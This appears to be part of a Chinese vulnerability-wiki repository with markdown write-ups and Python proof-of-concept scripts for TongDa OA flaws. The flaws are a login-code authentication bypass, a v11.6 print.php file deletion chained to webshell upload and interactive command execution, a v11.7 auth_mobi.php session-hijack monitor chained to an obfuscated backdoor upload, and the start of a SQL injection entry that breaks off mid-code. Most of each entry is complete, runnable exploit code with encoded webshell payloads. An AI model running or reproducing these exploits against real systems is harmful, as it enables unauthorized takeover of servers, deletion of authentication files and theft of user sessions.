"Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; QQDownload 732; .NET4.0C; .NET4.0E)",
"Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)",
"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.1 (KHTML, like Gecko) Chrome/21.0.1180.89 Safari/537.1",
"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.1 (KHTML, like Gecko) Chrome/21.0.1180.89 Safari/537.1",
"Mozilla/5.0 (iPad; U; CPU OS 4_2_1 like Mac OS X; zh-cn) AppleWebKit/533.17.9 (KHTML, like Gecko) Version/5.0.2 Mobile/8C148 Safari/6533.18.5",
"Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:2.0b13pre) Gecko/20110307 Firefox/4.0b13pre",
"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:16.0) Gecko/20100101 Firefox/16.0",
"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.11 (KHTML, like Gecko) Chrome/23.0.1271.64 Safari/537.11",
"Mozilla/5.0 (X11; U; Linux x86_64; zh-CN; rv:1.9.2.10) Gecko/20100922 Ubuntu/10.10 (maverick) Firefox/3.6.10"
]
headers={}
def getV11Session(url):
checkUrl = url+'/general/login_code.php'
try:
headers["User-Agent"] = choice(USER_AGENTS)
res = requests.get(checkUrl,headers=headers)
resText = str(res.text).split('{')
codeUid = resText[-1].replace('}"}', '').replace('\r\n', '')
getSessUrl = url+'/logincheck_code.php'
res = requests.post(
getSessUrl, data={'CODEUID': '{'+codeUid+'}', 'UID': int(1)},headers=headers)
tmp_cookie = res.headers['Set-Cookie']
headers["User-Agent"] = choice(USER_AGENTS)
headers["Cookie"] = tmp_cookie
check_available = requests.get(url + '/general/index.php',headers=headers)
if '用户未登录' not in check_available.text:
if '重新登录' not in check_available.text:
print('[+]Get Available COOKIE:' + tmp_cookie)
else:
print('[-]Something Wrong With ' + url + ',Maybe Not Vulnerable.')
except:
print('[-]Something Wrong With '+url)
def get2017Session(url):
checkUrl = url+'/ispirit/login_code.php'
try:
headers["User-Agent"] = choice(USER_AGENTS)
res = requests.get(checkUrl,headers=headers)
resText = json.loads(res.text)
codeUid = resText['codeuid']
codeScanUrl = url+'/general/login_code_scan.php'
res = requests.post(codeScanUrl, data={'codeuid': codeUid, 'uid': int(
1), 'source': 'pc', 'type': 'confirm', 'username': 'admin'},headers=headers)
resText = json.loads(res.text)
status = resText['status']
if status == str(1):
getCodeUidUrl = url+'/ispirit/login_code_check.php?codeuid='+codeUid
res = requests.get(getCodeUidUrl)
tmp_cookie = res.headers['Set-Cookie']
headers["User-Agent"] = choice(USER_AGENTS)
headers["Cookie"] = tmp_cookie
check_available = requests.get(url + '/general/index.php',headers=headers)
if '用户未登录' not in check_available.text:
if '重新登录' not in check_available.text:
print('[+]Get Available COOKIE:' + tmp_cookie)
else:
print('[-]Something Wrong With ' + url + ',Maybe Not Vulnerable.')
else:
print('[-]Something Wrong With '+url + ' Maybe Not Vulnerable ?')
except:
print('[-]Something Wrong With '+url)
if __name__ == "__main__":
parser = argparse.ArgumentParser()
parser.add_argument(
"-v",
"--tdoaversion",
type=int,
choices=[11, 2017],
help="Target TongDa OA Version. e.g: -v 11、-v 2017")
parser.add_argument(
"-url",
"--targeturl",
type=str,
help="Target URL. e.g: -url 192.168.2.1、-url http://192.168.2.1"
)
args = parser.parse_args()
url = args.targeturl
if 'http://' not in url:
url = 'http://' + url
if args.tdoaversion == 11:
getV11Session(url)
elif args.tdoaversion == 2017:
get2017Session(url)
else:
parser.print_help()
```

392
OA产品漏洞/通达OA v11.6 print.php 任意文件删除&RCE.md Normal file
View File

@ -0,0 +1,392 @@
# 通达OA v11.6 print.php 任意文件删除&RCE
## 漏洞描述
通过任意文件漏洞删除上传点包含的身份验证文件,从而造成未授权访问实现任意文件上传
## 漏洞影响
```
通达OA v11.6
```
## 环境搭建
[通达OA v11.6下载链接](https://cdndown.tongda2000.com/oa/2019/TDOA11.6.exe)
下载完毕点击安装即可
## 漏洞复现
使用解密工具 SeayDzend(zend解密工具) 对通达OA的加密代码进行解密
解密工具已经放在目录下的POC目录中
解密完成后查看 **webroot\general\data_center\utils\upload.php** 文件
```php
<?php
include_once "inc/auth.inc.php";
include_once "./utils.func.php";
$HTML_PAGE_TITLE = _("上传文件");
include_once "inc/header.inc.php";
$error = "";
$msg = "";
if ($action == "upload") {
if ($filetype == "xls") {
$uploaddir = MYOA_ATTACH_PATH . "/data_center/templates/";
if (!is_dir(MYOA_ATTACH_PATH . "/data_center/templates")) {
if (!is_dir(MYOA_ATTACH_PATH . "/data_center")) {
mkdir(MYOA_ATTACH_PATH . "/data_center");
}
mkdir(MYOA_ATTACH_PATH . "/data_center/templates");
}
if (move_uploaded_file($_FILES["FILE1"]["tmp_name"], $uploaddir . $_FILES["FILE1"]["name"])) {
}
}
else if ($filetype == "img") {
$uploaddir = MYOA_ATTACH_PATH . "/data_center/images/";
if (!is_dir(MYOA_ATTACH_PATH . "/data_center/images")) {
if (!is_dir(MYOA_ATTACH_PATH . "/data_center")) {
mkdir(MYOA_ATTACH_PATH . "/data_center");
}
mkdir(MYOA_ATTACH_PATH . "/data_center/images");
}
$s_n = $_FILES["FILE1"]["name"];
if ($s_n[0] != "{") {
$p = strrpos($s_n, ".");
$s_n = CreateId() . substr($s_n, $p);
}
if (move_uploaded_file($_FILES["FILE1"]["tmp_name"], $uploaddir . $s_n)) {
}
}
else {
$uploaddir = MYOA_ATTACH_PATH . "/data_center/attachment/";
if (!is_dir(MYOA_ATTACH_PATH . "/data_center/attachment")) {
if (!is_dir(MYOA_ATTACH_PATH . "/data_center")) {
mkdir(MYOA_ATTACH_PATH . "/data_center");
}
mkdir(MYOA_ATTACH_PATH . "/data_center/attachment");
}
if (isset($from_rep)) {
if (($from_rep != "") && ($from_rep[0] == "{")) {
$repkid = GetRepKIDBySendId($from_rep);
if ($repkid != $to_rep) {
if (file_exists($uploaddir . "/" . $repkid . "_" . $filename)) {
copy($uploaddir . "/" . $repkid . "_" . $filename, $uploaddir . "/" . $to_rep . "_" . $filename);
}
}
}
else {
$arr = explode(",", $from_rep);
for ($i = 0; $i < count($arr); $i++) {
$p = strpos($arr[$i], ".");
$repno = substr($arr[$i], 0, $p);
$repkid = GetRepKIDByNo($repno);
if ($repkid != $to_rep) {
if (file_exists($uploaddir . "/" . $repkid . "_" . $filename)) {
copy($uploaddir . "/" . $repkid . "_" . $filename, $uploaddir . "/" . $to_rep . "_" . $filename);
break;
}
}
}
}
}
else {
$s_n = $_FILES["FILE1"]["name"];
if ($s_n[0] != "{") {
$s_n = $repkid . "_" . $s_n;
}
if (move_uploaded_file($_FILES["FILE1"]["tmp_name"], $uploaddir . $s_n)) {
}
}
}
@unlink($_FILES["FILE1"]);
}
else if ($action == "unupload") {
if ($filetype == "xls") {
$uploaddir = MYOA_ATTACH_PATH . "data_center/attachment/" . trim($filename) . ".xls";
if (is_file($uploaddir)) {
unlink($uploaddir);
}
}
else if ($filetype == "img") {
$uploaddir = MYOA_ATTACH_PATH . "data_center/images/" . trim($filename);
if (is_file($uploaddir)) {
unlink($uploaddir);
}
}
else if ($filetype == "attach") {
$uploaddir = MYOA_ATTACH_PATH . "data_center/attachment/" . trim($filename);
if (is_file($uploaddir)) {
unlink($uploaddir);
}
}
}
echo "{";
echo "new_name:'$s_n',\n";
echo "error: '" . $error . "',\n";
echo "msg: '" . $msg . "'\n";
echo "}";
echo "<body>\r\n</body>\r\n</html>";
?>
```
在第一行包含了文件 **auth.inc.php**
```php
include_once "inc/auth.inc.php";
```
![image-20220209105907490](https://typora-1308934770.cos.ap-beijing.myqcloud.com/202202091059689.png)
可以看到这个文件用于检验是否登录,未登录的情况无法利用这个漏洞
查看 **\webroot\module\appbuilder\assets\print.php**文件
![image-20220209105939041](https://typora-1308934770.cos.ap-beijing.myqcloud.com/202202091059191.png)
```php
<?php
$s_tmp = __DIR__ . "/../../../../logs/appbuilder/logs";
$s_tmp .= "/" . $_GET["guid"];
if (file_exists($s_tmp)) {
$arr_data = unserialize(file_get_contents($s_tmp));
unlink($s_tmp);
$s_user = $arr_data["user"];
}
else {
echo "未知参数";
exit();
}
```
这里可以看到 页面获取 guid参数的值
使用**file_exists函数**判断文件是否存在 并未进行校验 就执行unlink删除文件
可以本地在 **\webroot\inc** 目录创建 1.txt 文件
然后访问 [**http://xxx.xxx.xxx.xxx/module/appbuilder/assets/print.php?guid=../../../webroot/inc/1.txt**](http://xxx.xxx.xxx.xxx/module/appbuilder/assets/print.php?guid=../../../webroot/inc/1.txt) 就会删除这个 1.txt 文件,也代表可以删除 **auth.inc.php** 登录检验文件
回到 upload.php 文件进行代码审计
![](../../images/e4502bc6-6698-49d6-8984-46c3f195264e.png)
判断变量 **$action** 是否为 upload再判断文件类型如果不为 xls 和 img 则进入else分支
```php
else {
$uploaddir = MYOA_ATTACH_PATH . "/data_center/attachment/";
if (!is_dir(MYOA_ATTACH_PATH . "/data_center/attachment")) {
if (!is_dir(MYOA_ATTACH_PATH . "/data_center")) {
mkdir(MYOA_ATTACH_PATH . "/data_center");
}
mkdir(MYOA_ATTACH_PATH . "/data_center/attachment");
}
if (isset($from_rep)) {
if (($from_rep != "") && ($from_rep[0] == "{")) {
$repkid = GetRepKIDBySendId($from_rep);
if ($repkid != $to_rep) {
if (file_exists($uploaddir . "/" . $repkid . "_" . $filename)) {
copy($uploaddir . "/" . $repkid . "_" . $filename, $uploaddir . "/" . $to_rep . "_" . $filename);
}
}
}
else {
$arr = explode(",", $from_rep);
for ($i = 0; $i < count($arr); $i++) {
$p = strpos($arr[$i], ".");
$repno = substr($arr[$i], 0, $p);
$repkid = GetRepKIDByNo($repno);
if ($repkid != $to_rep) {
if (file_exists($uploaddir . "/" . $repkid . "_" . $filename)) {
copy($uploaddir . "/" . $repkid . "_" . $filename, $uploaddir . "/" . $to_rep . "_" . $filename);
break;
}
}
}
}
}
else {
$s_n = $_FILES["FILE1"]["name"];
if ($s_n[0] != "{") {
$s_n = $repkid . "_" . $s_n;
}
if (move_uploaded_file($_FILES["FILE1"]["tmp_name"], $uploaddir . $s_n)) {
}
}
}
@unlink($_FILES["FILE1"]);
}
```
在这段代码中,如果不存在 **$from_rep** 变量则会跳到如下代码
```php
else {
$s_n = $_FILES["FILE1"]["name"];
if ($s_n[0] != "{") {
$s_n = $repkid . "_" . $s_n;
}
if (move_uploaded_file($_FILES["FILE1"]["tmp_name"], $uploaddir . $s_n)) {
}
}
```
这里直接将 **$repkid** 变量进行拼接,也就是说可以通过目录穿越来上传恶意文件到指定目录
这里需要利用file_exists函数的漏洞构造/.<>./.<>./.<>./ 逃逸出来
使用POC来利用漏洞
![image-20220209110025711](https://typora-1308934770.cos.ap-beijing.myqcloud.com/202202091100958.png)
注意在删除验证身份的文件后,会造成后台页面出现如下图,使用前备份文件
![image-20220209110050983](https://typora-1308934770.cos.ap-beijing.myqcloud.com/202202091100063.png)
## 漏洞POC
```python
#!/usr/bin/python3
#-*- coding:utf-8 -*-
# author : PeiQi
# from : http://wiki.peiqi.tech
import requests
import re
import base64
import sys
def title():
print('+------------------------------------------')
print('+ \033[34mPOC_Des: http://wiki.peiqi.tech \033[0m')
print('+ \033[34mVersion: 通达OA v11.6 任意文件删除&RCE \033[0m')
print('+ \033[36m使用格式: python3 poc.py \033[0m')
print('+ \033[36mUrl >>> http://xxx.xxx.xxx.xxx \033[0m')
print('+ \033[36mCmd >>> whoami \033[0m')
print('+------------------------------------------')
def POC_1(target_url):
check_url = target_url + "/module/appbuilder/assets/print.php"
try:
check_url_response = requests.get(url = check_url)
if check_url_response.status_code == 200:
print("\033[32m[o] 存在 /module/appbuilder/assets/print.php 可能含有通达OA v11.6 任意文件删除&RCE漏洞\033[0m")
input("\033[32m[o] 此漏洞会对真实环境造成影响,请在授权的情况下利用此漏洞,按下任意键继续..... \033[0m")
else:
print("\033[31m[x] 不存在 /module/appbuilder/assets/print.php 漏洞利用失败 \033[0m")
sys.exit(0)
except Exception as e:
print("\033[31m[x] 请求失败,{} \033[0m".format(e))
sys.exit(0)
def POC_2(target_url):
unlink_url = target_url + "/module/appbuilder/assets/print.php?guid=../../../webroot/inc/auth.inc.php"
try:
unlink_response = requests.get(url = unlink_url)
if unlink_response.status_code == 200:
print("\033[32m[o] 成功删除校验文件 auth.inc.php \033[0m")
else:
print("\033[31m[x] 删除校验文件 auth.inc.php 失败 \033[0m")
sys.exit(0)
except Exception as e:
print("\033[31m[x] 请求失败,{} \033[0m".format(e))
sys.exit(0)
def POC_3(target_url, payload_php):
"""
(绕过的webshell)
<?php
$command=$_GET['test'];
$wsh = new COM('WScript.shell');
$exec = $wsh->exec("cmd /c ".$command);
$stdout = $exec->StdOut();
$stroutput = $stdout->ReadAll();
echo $stroutput;
?>
"""
vuln_url = target_url + "/general/data_center/utils/upload.php?action=upload&filetype=test&repkid=/.<>./.<>./.<>./"
files = {'FILE1': ('test.php', payload_php)}
try:
vuln_response = requests.post(url = vuln_url,files=files)
if vuln_response.status_code == 200:
print("\033[32m[o] 成功写入webshell文件: _test.php \033[0m")
print("\033[32m[o] webshell地址为: {}/_test.php \033[0m".format(target_url))
else:
print("\033[31m[x] 写入webshell文件失败 \033[0m")
sys.exit(0)
except Exception as e:
print("\033[31m[x] 请求失败,{} \033[0m".format(e))
sys.exit(0)
def POC_4(target_url, cmd):
cmd_url = target_url + "/_test.php?test={}".format(cmd)
try:
cmd_response = requests.get(url = cmd_url)
if cmd_response.status_code == 200:
print("\033[32m[o] 正在执行命令: {} \033[0m".format(cmd_url))
print("\033[32m[o] 响应为: \n{} \033[0m".format(cmd_response.text))
else:
print("\033[31m[x] 命令执行失败 \033[0m")
sys.exit(0)
except Exception as e:
print("\033[31m[x] 请求失败,{} \033[0m".format(e))
sys.exit(0)
if __name__ == '__main__':
title()
target_url = str(input("\033[35mPlease input Attack Url\nUrl >>> \033[0m"))
POC_1(target_url)
POC_2(target_url)
payload_php = base64.b64decode("PD9waHAKICAgICRjb21tYW5kPSRfR0VUWyd0ZXN0J107CiAgICAkd3NoID0gbmV3IENPTSgnV1NjcmlwdC5zaGVsbCcpOwogICAgJGV4ZWMgPSAkd3NoLT5leGVjKCJjbWQgL2MgIi4kY29tbWFuZCk7CiAgICAkc3Rkb3V0ID0gJGV4ZWMtPlN0ZE91dCgpOwogICAgJHN0cm91dHB1dCA9ICRzdGRvdXQtPlJlYWRBbGwoKTsKICAgIGVjaG8gJHN0cm91dHB1dDsKPz4=").decode("utf-8")
POC_3(target_url, payload_php)
while True:
cmd = input("\033[35mCmd >>> \033[0m")
if cmd == "exit":
sys.exit(0)
else:
POC_4(target_url, cmd)
```
![image-20220209110115108](https://typora-1308934770.cos.ap-beijing.myqcloud.com/202202091101200.png)

268
OA产品漏洞/通达OA v11.7 auth_mobi.php 在线用户登录漏洞.md Normal file
View File

@ -0,0 +1,268 @@
# 通达OA v11.7 auth_mobi.php 在线用户登录漏洞
## 漏洞描述
通达OA v11.7 中存在某接口查询在线用户,当用户在线时会返回 PHPSESSION使其可登录后台系统
## 漏洞影响
```
通达OA < v11.7
```
## 环境搭建
[通达OA v11.7下载链接](https://cdndown.tongda2000.com/oa/2019/TDOA11.7.exe)
下载后按步骤安装即可
## 漏洞复现
漏洞有关文件 **MYOA\webroot\mobile\auth_mobi.php**
```php
<?php
function relogin()
{
echo _('RELOGIN');
exit;
}
ob_start();
include_once 'inc/session.php';
include_once 'inc/conn.php';
include_once 'inc/utility.php';
if ($isAvatar == '1' && $uid != '' && $P_VER != '') {
$sql = 'SELECT SID FROM user_online WHERE UID = \'' . $uid . '\' and CLIENT = \'' . $P_VER . '\'';
$cursor = exequery(TD::conn(), $sql);
if ($row = mysql_fetch_array($cursor)) {
$P = $row['SID'];
}
}
if ($P == '') {
$P = $_COOKIE['PHPSESSID'];
if ($P == '') {
relogin();
exit;
}
}
if (preg_match('/[^a-z0-9;]+/i', $P)) {
echo _('非法参数');
exit;
}
if (strpos($P, ';') !== false) {
$MY_ARRAY = explode(';', $P);
$P = trim($MY_ARRAY[1]);
}
session_id($P);
session_start();
session_write_close();
if ($_SESSION['LOGIN_USER_ID'] == '' || $_SESSION['LOGIN_UID'] == '') {
relogin();
}
```
在执行的 SQL语句中
```sql
$sql = 'SELECT SID FROM user_online WHERE UID = \'' . $uid . '\' and CLIENT = \'' . $P_VER . '\'';
```
![image-20220209110301234](https://typora-1308934770.cos.ap-beijing.myqcloud.com/202202091103308.png)
简单阅读PHP源码可以知道 此SQL语句会查询用户是否在线如在线返回此用户 Session ID
![image-20220209110315136](https://typora-1308934770.cos.ap-beijing.myqcloud.com/202202091103236.png)
将返回的 Set-Cookie 中的Cookie参数值使用于登录Cookie
访问目标后台 http://xxx.xxx.xxx.xxx/general/
![image-20220209110344202](https://typora-1308934770.cos.ap-beijing.myqcloud.com/202202091103301.png)
当目标离线时则访问漏洞页面则会出现如下图
遍历uid也可以获取其他用户权限可能权限较低
![image-20220209110407741](https://typora-1308934770.cos.ap-beijing.myqcloud.com/202202091104808.png)
通过此思路可以持续发包监控此页面来获取在线用户的Cookie
## 漏洞POC
5秒一次测试用户是否在线
```python
import requests
import sys
import random
import re
import time
from requests.packages.urllib3.exceptions import InsecureRequestWarning
def title():
print('+------------------------------------------')
print('+ \033[34mPOC_Des: http://wiki.peiqi.tech \033[0m')
print('+ \033[34mGithub : https://github.com/PeiQi0 \033[0m')
print('+ \033[34m公众号 : PeiQi文库 \033[0m')
print('+ \033[34mVersion: 通达OA 11.7 \033[0m')
print('+ \033[36m使用格式: python3 poc.py \033[0m')
print('+ \033[36mUrl >>> http://xxx.xxx.xxx.xxx \033[0m')
print('+------------------------------------------')
def POC_1(target_url):
vuln_url = target_url + "/mobile/auth_mobi.php?isAvatar=1&uid=1&P_VER=0"
headers = {
"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.111 Safari/537.36",
}
try:
requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
response = requests.get(url=vuln_url, headers=headers, verify=False, timeout=5)
if "RELOGIN" in response.text and response.status_code == 200:
print("\033[31m[x] 目标用户为下线状态 --- {}\033[0m".format(time.asctime( time.localtime(time.time()))))
elif response.status_code == 200 and response.text == "":
PHPSESSION = re.findall(r'PHPSESSID=(.*?);', str(response.headers))
print("\033[32m[o] 用户上线 PHPSESSION: {} --- {}\033[0m".format(PHPSESSION[0] ,time.asctime(time.localtime(time.time()))))
else:
print("\033[31m[x] 请求失败,目标可能不存在漏洞")
sys.exit(0)
except Exception as e:
print("\033[31m[x] 请求失败 \033[0m", e)
if __name__ == '__main__':
title()
target_url = str(input("\033[35mPlease input Attack Url\nUrl >>> \033[0m"))
while True:
POC_1(target_url)
time.sleep(5)
```
![image-20220209110424915](https://typora-1308934770.cos.ap-beijing.myqcloud.com/202202091104066.png)
于 2021-3-11 添加进一步利用POC
配合 < v11.8 命令执行 当监控到用户上线控制服务器
```python
import requests
import sys
import random
import re
import base64
import time
from requests.packages.urllib3.exceptions import InsecureRequestWarning
def title():
print('+------------------------------------------')
print('+ \033[34mPOC_Des: http://wiki.peiqi.tech \033[0m')
print('+ \033[34mVersion: 通达OA 11.7 \033[0m')
print('+ \033[36m使用格式: python3 poc.py \033[0m')
print('+ \033[36mUrl >>> http://xxx.xxx.xxx.xxx \033[0m')
print('+------------------------------------------')
def POC_0(target_url):
vuln_url = target_url + "/mobile/auth_mobi.php?isAvatar=1&uid=1&P_VER=0"
headers = {
"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.111 Safari/537.36",
}
try:
requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
response = requests.get(url=vuln_url, headers=headers, verify=False, timeout=5)
if "RELOGIN" in response.text and response.status_code == 200:
print("\033[31m[x] 目标用户为下线状态 --- {}\033[0m".format(time.asctime( time.localtime(time.time()))))
elif response.status_code == 200 and response.text == "":
Cookie = re.findall(r'PHPSESSID=(.*?);', str(response.headers))
print("\033[32m[o] 用户上线 PHPSESSION: {} --- {}\033[0m".format(Cookie[0] ,time.asctime(time.localtime(time.time()))))
Cookie = "PHPSESSID={};USER_NAME_COOKIE=admin; OA_USER_ID=admin".format(Cookie[0])
POC_1(target_url, Cookie)
else:
print("\033[31m[x] 请求失败,目标可能不存在漏洞")
sys.exit(0)
except Exception as e:
print("\033[31m[x] 请求失败 \033[0m", e)
def POC_1(target_url, Cookie):
vuln_url = target_url + "/general/hr/manage/staff_info/update.php?USER_ID=../../general/reportshop\workshop/report/attachment-remark/.user"
headers = {
"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.111 Safari/537.36",
"Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8",
"Accept-Language": "zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2",
"Accept-Encoding": "gzip, deflate",
"Content-Type": "multipart/form-data; boundary=---------------------------17518323986548992951984057104",
"Connection": "close",
"Cookie": Cookie,
"Upgrade-Insecure-Requests": "1",
}
data = base64.b64decode("LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0xNzUxODMyMzk4NjU0ODk5Mjk1MTk4NDA1NzEwNApDb250ZW50LURpc3Bvc2l0aW9uOiBmb3JtLWRhdGE7IG5hbWU9IkFUVEFDSE1FTlQiOyBmaWxlbmFtZT0idGVzdC5pbmkiCkNvbnRlbnQtVHlwZTogdGV4dC9wbGFpbgoKYXV0b19wcmVwZW5kX2ZpbGU9dGVzdC5sb2cKLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0xNzUxODMyMzk4NjU0ODk5Mjk1MTk4NDA1NzEwNApDb250ZW50LURpc3Bvc2l0aW9uOiBmb3JtLWRhdGE7IG5hbWU9InN1Ym1pdCIKCuaPkOS6pAotLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLTE3NTE4MzIzOTg2NTQ4OTkyOTUxOTg0MDU3MTA0LS0=")
try:
requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
response = requests.post(url=vuln_url, data=data, headers=headers, verify=False, timeout=5)
print("\033[36m[o] 正在请求 {}/general/hr/manage/staff_info/update.php?USER_ID=../../general/reportshop/workshop/report/attachment-remark/.user \033[0m".format(target_url))
if "档案已保存" in response.text and response.status_code == 200:
print("\033[32m[o] 目标 {} 成功上传.user.ini文件, \033[0m".format(target_url))
POC_2(target_url, Cookie)
else:
print("\033[31m[x] 目标 {} 上传.user.ini文件失败\033[0m".format(target_url))
sys.exit(0)
except Exception as e:
print("\033[31m[x] 请求失败 \033[0m", e)
def POC_2(target_url, Cookie):
vuln_url = target_url + "/general/hr/manage/staff_info/update.php?USER_ID=../../general/reportshop\workshop/report/attachment-remark/test"
headers = {
"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.111 Safari/537.36",
"Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8",
"Accept-Language": "zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2",
"Accept-Encoding": "gzip, deflate",
"Content-Type": "multipart/form-data; boundary=---------------------------17518323986548992951984057104",
"Connection": "close",
"Cookie": Cookie,
"Upgrade-Insecure-Requests": "1",
}
data = base64.b64decode("LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0xNzUxODMyMzk4NjU0ODk5Mjk1MTk4NDA1NzEwNApDb250ZW50LURpc3Bvc2l0aW9uOiBmb3JtLWRhdGE7IG5hbWU9IkFUVEFDSE1FTlQiOyBmaWxlbmFtZT0idGVzdC5sb2ciCkNvbnRlbnQtVHlwZTogdGV4dC9wbGFpbgoKPD9waHAgCmVjaG8gInRlc3RfV2lraSI7CiRwemtCPWNyZWF0ZV9mdW5jdGlvbihjaHIoMDEwMTc1MC8wMTY1MikuYmFzZTY0X2RlY29kZSgnY3c9PScpLmJhc2U2NF9kZWNvZGUoJ2J3PT0nKS5jaHIoOTkwODEvOTA5KS5jaHIoMDEwMjUtMDY2MCksY2hyKDA1MTctMDM1MikuY2hyKDB4MzQzLTB4MmNkKS5iYXNlNjRfZGVjb2RlKCdZUT09Jykuc3RyX3JvdDEzKCd5JykuYmFzZTY0X2RlY29kZSgnS0E9PScpLmJhc2U2NF9kZWNvZGUoJ0pBPT0nKS5jaHIoNDQ0LTMyOSkuYmFzZTY0X2RlY29kZSgnYnc9PScpLmNocig1OTctNDg4KS5jaHIoMHgxOWYtMHgxM2EpLmNocigyMTktMTc4KS5iYXNlNjRfZGVjb2RlKCdPdz09JykpOyRwemtCKGJhc2U2NF9kZWNvZGUoJ05EZzFOJy4nemMyTzAnLidCbGRrRicuJ3NLQ1JmJy4nJy5jaHIoODIxMTAvOTY2KS5iYXNlNjRfZGVjb2RlKCdSUT09Jykuc3RyX3JvdDEzKCc5JykuY2hyKDAxNTUwNjQvMDEyMzEpLmJhc2U2NF9kZWNvZGUoJ1ZnPT0nKS4nJy4nJy5zdHJfcm90MTMoJ1MnKS5iYXNlNjRfZGVjb2RlKCdkQT09JykuYmFzZTY0X2RlY29kZSgnTUE9PScpLmNocig2MDc1MC82NzUpLmNocigwMTUwNy0wMTM1NykuJycuJ04wWFNrJy4nN01UUTEnLidOek15TycuJ0RzPScuJycpKTs/PgotLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLTE3NTE4MzIzOTg2NTQ4OTkyOTUxOTg0MDU3MTA0CkNvbnRlbnQtRGlzcG9zaXRpb246IGZvcm0tZGF0YTsgbmFtZT0ic3VibWl0IgoK5o+Q5LqkCi0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tMTc1MTgzMjM5ODY1NDg5OTI5NTE5ODQwNTcxMDQtLQo=")
try:
requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
response = requests.post(url=vuln_url, data=data, headers=headers, verify=False, timeout=5)
print("\033[36m[o] 正在请求 {}/general/hr/manage/staff_info/update.php?USER_ID=../../general/reportshop/workshop/report/attachment-remark/test \033[0m".format(target_url))
if "档案已保存" in response.text and response.status_code == 200:
print("\033[32m[o] 目标 {} 成功上传 test.log 文件, \033[0m".format(target_url))
POC_3(target_url, Cookie)
else:
print("\033[31m[x] 目标 {} 上传 test.log 文件失败\033[0m".format(target_url))
sys.exit(0)
except Exception as e:
print("\033[31m[x] 请求失败 \033[0m", e)
def POC_3(target_url, Cookie):
vuln_url = target_url + "/general/reportshop/workshop/report/attachment-remark/form.inc.php?"
headers = {
"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.111 Safari/537.36",
"Cookie": Cookie,
}
try:
requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
response = requests.get(url=vuln_url, headers=headers, verify=False, timeout=5)
print("\033[36m[o] 正在请求 {}/general/reportshop/workshop/report/attachment-remark/form.inc.php? \033[0m".format(target_url))
if "test_Wiki" in response.text and response.status_code == 200:
print("\033[32m[o] 目标 {} 存在漏洞,响应中包含 test_Wiki \033[0m".format(target_url))
print("\033[32m[o] 成功上传蚁剑木马 密码为: test \n[o] webshell路径: {}/general/reportshop/workshop/report/attachment-remark/form.inc.php?\033[0m".format(target_url))
sys.exit(0)
else:
print("\033[31m[x] 目标 {} 不存在漏洞,响应中不包含 test_Wiki\033[0m".format(target_url))
sys.exit(0)
except Exception as e:
print("\033[31m[x] 请求失败 \033[0m", e)
if __name__ == '__main__':
title()
target_url = str(input("\033[35mPlease input Attack Url\nUrl >>> \033[0m"))
while True:
POC_0(target_url)
time.sleep(5)
```
![image-20220209110452574](https://typora-1308934770.cos.ap-beijing.myqcloud.com/202202091104695.png)

105
OA产品漏洞/通达OA v11.7 delete_cascade.php 后台SQL注入.md Normal file
View File

@ -0,0 +1,105 @@
# 通达OA v11.7 delete_cascade.php 后台SQL注入
## 漏洞描述
通达OA v11.7后台存在SQL注入可通过此漏洞写入恶意后门文件攻击目标服务器
## 漏洞影响
```
通达OA v11.7
```
## 环境搭建
[环境地址](https://cdndown.tongda2000.com/oa/2019/TDOA11.7.exe)
## 漏洞复现
**general/hr/manage/query/delete_cascade.php** 文件中
![image-20220209110843192](https://typora-1308934770.cos.ap-beijing.myqcloud.com/202202091108270.png)
首先判断`$condition_cascade`是否为空,如果不为空,则将其中的`\'`替换为`'`。为什么要这样替换呢主要是因为V11.7版本中,注册变量时考虑了安全问题,将用户输入的字符用`addslashes`函数进行保护,如下:
**inc/common.inc.php** 代码
![image-20220209110858090](https://typora-1308934770.cos.ap-beijing.myqcloud.com/202202091108141.png)
使用盲注对SQL注入进行测试
![image-20220209110914705](https://typora-1308934770.cos.ap-beijing.myqcloud.com/202202091109818.png)
触发了通达OA的SQL注入拦截
**inc/conn.php**文件中找到过滤机制如下:
![image-20220209110944424](https://typora-1308934770.cos.ap-beijing.myqcloud.com/202202091109512.png)
其过滤了一些字符,但是并非无法绕过,盲注的核心是:`substr、if`等函数均未被过滤那么只要构造MySQL报错即可配合`if`函数进行盲注了,翻看局外人师傅在补天白帽大会上的分享,发现`power(9999,99)`也可以使数据库报错,所以构造语句:
```sql
